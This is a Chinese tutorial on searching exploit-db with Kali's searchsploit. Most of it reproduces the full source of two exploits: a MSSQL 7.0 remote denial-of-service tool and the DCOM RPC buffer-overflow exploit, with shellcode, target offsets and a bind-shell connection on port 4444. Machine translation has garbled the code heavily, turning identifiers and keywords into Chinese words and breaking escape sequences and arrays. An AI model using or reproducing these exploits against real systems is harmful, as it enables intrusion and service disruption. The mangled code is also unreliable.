這篇文章來自www.cnhackteam.org。
Searchsploit將通過本地exploit-db搜索軟件漏洞信息。
打開kali的命令行並輸入:
searchsploit
查看系統幫助
查找mssql的漏洞
如果要查找mssql的漏洞,命令如下,會找到所有與mssql相關的漏洞信息,後面是相關的漏洞描述信息:
searchsploit mssql
要看相關的漏洞描述,如果想看mysql7.0的遠程DOS漏洞,用編輯器打開漏洞描述後面的路徑就可以了:
leaf pad/usr/share/exploit db/platforms/。/windows/dos/562.c
文本文件中的內容是漏洞描述文件和漏洞利用文件:
/* Microsoft mssql 7.0 server容易受到拒絕服務攻擊
*通過發送包含指定數據的大型緩沖區,攻擊者可以阻止
服務
* "mssqlserver "註意到的錯誤因服務而異
包裝,但結果總是
*同壹個。
*異常代碼= c0000005
*易受攻擊:MSSQL7.0 sp0 - sp1 - sp2 - sp3
*本守則出於教育目的,我不對您的行為負責
*問候:sm0g DEADm|x #crack.fr itmaroc和evryone我忘記了*/# include & lt;stdio.h & gt
# include & ltwinsock.h & gt
#pragma註釋(lib," ws2_32 ")
u _ long resolv(char *);
void main(int argc,char **argv) {
WSADATA WinsockData
插座s;int I;vulh中的結構sockaddr _ inchar緩沖區[700000];for(I = 0;我& lt700000;i+=16)memcpy(buffer+i," \ x 10 \ x00 \ x00 \ x 10 \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc ",16);如果(argc!=3) {
printf(" MSSQL拒絕服務\ n ");
printf("作者securma massine \ n ");
我沒有參加任何考試
妳應該對自己的行為負責。
printf(" syntax:MSSQL dos & lt;ip & gt& lt端口& gt\ n ");
退出(1);
}
WSAStartup(0x101,& ampWinsockData);
s=socket(AF_INET,SOCK_STREAM,IP proto _ TCP);
zero memory(& amp;vulh,sizeof(vulh));
vulh.sin _ family = AF _ INET
vulh . sin _ addr . s _ addr = resolv(argv[1]);
vulh . sin _ port = htons(atoi(argv[2]);if (connect(s,(struct sockaddr *)& amp;vulh,sizeof(vulh))==SOCKET_ERROR) {
printf("不可能的連接器...港口壹般是1433...\ n ");
退出(1);
}
{
send(s,buffer,sizeof(buffer),0);
printf("數據環境...\ n ");
}
printf(" \ nattendez querques seconds和verifiez que le serveur ne
報告加。\ n ");
closesocket
WSACleanup();
}
u _ long resolv(char *主機名){ struct in _ addr addrstruct hostent * host _ entif((addr . s _ addr = inet _ addr(host _ name))= =-1){ if(!(host _ ent = gethostbyname(host _ name))){
printf ("Erreur DNS:不可能得到地址%s
!!!\n ",主機名);
退出(1);
}
copy memory((char *)& amp;addr.s_addr,host _ ent-& gt;h_addr,host _ ent-& gt;h _ length);
} return addr.s _ addr
}//milw0rm.com[2004-09-29]查看代碼
查找與window XP相關的漏洞。
searchsploit /xp
要查看漏洞文件:
leaf pad/usr/share/exploit db/platforms/。/windows/remote/66.c
/*
?LSD - Exploit基於Xfocus的代碼發現DCOM RPC溢出
作者H D .摩爾& ltmetasploit.com的hdm
-用法:。/DCOM & lt;目標ID & gt& lt目標IP & gt
?-目標:
?- ?0 Windows 2000 SP0(英語)
?- ?1 Windows 2000 SP1(英語)
?- ?2 Windows 2000 SP2(英語)
?- ?3 Windows 2000 SP3(英語)
?- ?4 Windows 2000 SP4(英語)
?- ?5 Windows XP SP0(英語)
?- ?6 Windows XP SP1(英語)
*/# include & lt;stdio.h & gt# include & ltstdlib.h & gt# include & lterror.h & gt# include & ltsys/types . h & gt;# include & ltsys/socket . h & gt;# include & ltnetinet/in . h & gt;# include & ltarpa/inet . h & gt;# include & ltunistd.h & gt# include & ltnetdb.h & gt# include & ltfcntl.h & gt# include & ltunistd.h & gt無符號字符bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,0x16,0xD0,0x16,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x01無符號字符請求1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x06,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,無符號char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x5C,0x00,0x5C,0x 00 };無符號字符請求3[]={ 0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00無符號字符*目標[] =
{“Windows 2000 SP0(英文)”、“Windows 2000 SP1(英文)”、“Windows 2000 SP2(英文)”、“Windows 2000 SP3(英文)”、“Windows 2000 SP4(英文)”、“Windows XP SP0(英文)”、“Windows XP SP1(英文)”、NULL };無符號長偏移量[] =
{ 0x77e81674,0x77e829ec,0x77e824b5,0x77e8367a,0x77f92a9b,0x77e9afe3,0x77e626ba,
};unsigned char sc[]= " \ x46 \ x00 \ x58 \ x00 \ x42 \ x00 \ x46 \ x00 \ x58 \ x00 " " \ x46 \ x00 \ x44 \ x00 \ x42 \ x00 \ x46 \ x00 \ x58 \ x46 \ x00 \ x58 \ x00 " " \ x46 \ x00 \ x58 \ x00 \ x46 \ x00 \ x00 \ x00 \ x00 " " \ xff \ xff無符號字符請求4[]={ 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x 88,08,02,/*翻錄自TESO碼*/void shell(int sock){ int l;char buf[512];
fd_set?rfdswhile (1) {
FD _ SET(0 & amp;rfds);
FD _ SET(sock & amp;rfds);
選擇(sock + 1,& amprfds,NULL,NULL,NULL);if (FD_ISSET (0,& amprfds)) {
l = read (0,buf,sizeof(buf));if(l & lt;= 0) { printf("\n -連接被本地用戶關閉\ n ");退出(EXIT _ FAILURE);
}
write (sock,buf,l);
} if (FD_ISSET (sock,& amprfds)) {
l = read (sock,buf,sizeof(buf));if (l == 0) { printf ("\n -連接被遠程主機關閉。\ n ");退出(EXIT _ FAILURE);
} else if(l & lt;0) { printf ("\n -讀取失敗\ n ");退出(EXIT _ FAILURE);
}
write (1,buf,l);
}
}
} int main(int argc,char * * argv){ int sock;int len,len 1;無符號整數target _ id無符號長整型retstruct sockaddr _ in target _ ip無符號短端口= 135;無符號char buf 1[0x 1000];無符號char buf 2[0x 1000];printf("-\ n ");printf("-遠程DCOM RPC緩沖區溢出漏洞利用\ n ");printf("-FlashSky和Benjurry的原始代碼\ n ");printf("-由HDM改寫& lthdm[at]metasploit . com & gt;\ n ");if(argc & lt;3)
{ printf("-用法:% s & lt目標ID & gt& lt目標IP & gt\n ",argv[0]);printf("-Targets:\ n ");for(len = 0;目標[len]!= NULLlen++)
{ printf("-?%d\t%s\n ",len,targets[len]);?
} printf(" \ n ");退出(1);
} /*耶,想得開:)*/target _ id = atoi(argv[1]);
ret = offsets[目標標識];printf("-使用返回地址0x%.8x\n ",ret);memcpy(sc+36,(無符號字符*)& amp;ret,4);
target _ ip.sin _ family = AF _ INET
target _ IP . sin _ addr . s _ addr = inet _ addr(argv[2]);
target _ IP . sin _ port = htons(port);if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("-Socket ");return(0);
} if(connect(sock,(struct sockaddr *)?_ip,sizeof(target_ip))!= 0)
{
perror("-Connect ");return(0);
}
len = sizeof(sc);memcpy(buf2,request1,sizeof(request 1));
len 1 = sizeof(request 1);
*(無符號長整型*)(request2)=*(無符號長整型*)(request 2)+sizeof(sc)/2;?
*(無符號長整型*)(request2+8)=*(無符號長整型*)(request 2+8)+sizeof(sc)/2;memcpy(buf2+len1,request2,sizeof(request 2));
len 1 = len 1+sizeof(request 2);memcpy(buf2+len1,sc,sizeof(sc));
len 1 = len 1+sizeof(sc);memcpy(buf2+len1,request3,sizeof(request 3));
len 1 = len 1+sizeof(request 3);memcpy(buf2+len1,request4,sizeof(request 4));
len 1 = len 1+sizeof(request 4);
*(無符號長整型*)(buf2+8)=*(無符號長整型*)(buf 2+8)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0x10)=*(無符號長整型*)(buf 2+0x 10)+sizeof(sc)-0xc;?
*(無符號長整型*)(buf2+0x80)=*(無符號長整型*)(buf 2+0x 80)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0x84)=*(無符號長整型*)(buf 2+0x 84)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0xb4)=*(無符號長整型*)(buf 2+0x B4)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0xb8)=*(無符號長整型*)(buf 2+0x b8)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0xd0)=*(無符號長整型*)(buf 2+0xd 0)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0x18c)=*(無符號長整型*)(buf 2+0x 18c)+sizeof(sc)-0xc;if (send(sock,bindstr,sizeof(bindstr),0)== -1)
{
perror("-Send ");return(0);
}
len=recv(sock,buf1,1000,0);if (send(sock,buf2,len1,0)== -1)
{
perror("-Send ");return(0);
}
關閉(襪子);
睡眠(1);
target _ ip.sin _ family = AF _ INET
target _ IP . sin _ addr . s _ addr = inet _ addr(argv[2]);
target _ IP . sin _ port = htons(4444);if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("-Socket ");return(0);
} if(connect(sock,(struct sockaddr *)?_ip,sizeof(target_ip))!= 0)
{ printf("- Exploit似乎已經失敗。\ n ");return(0);
} printf("-放入系統外殼...\ n \ n ");
貝殼(襪子);return(0);
}//milw0rm.com[2003-07-26]查看代碼
找到蘋果的漏洞
搜索蘋果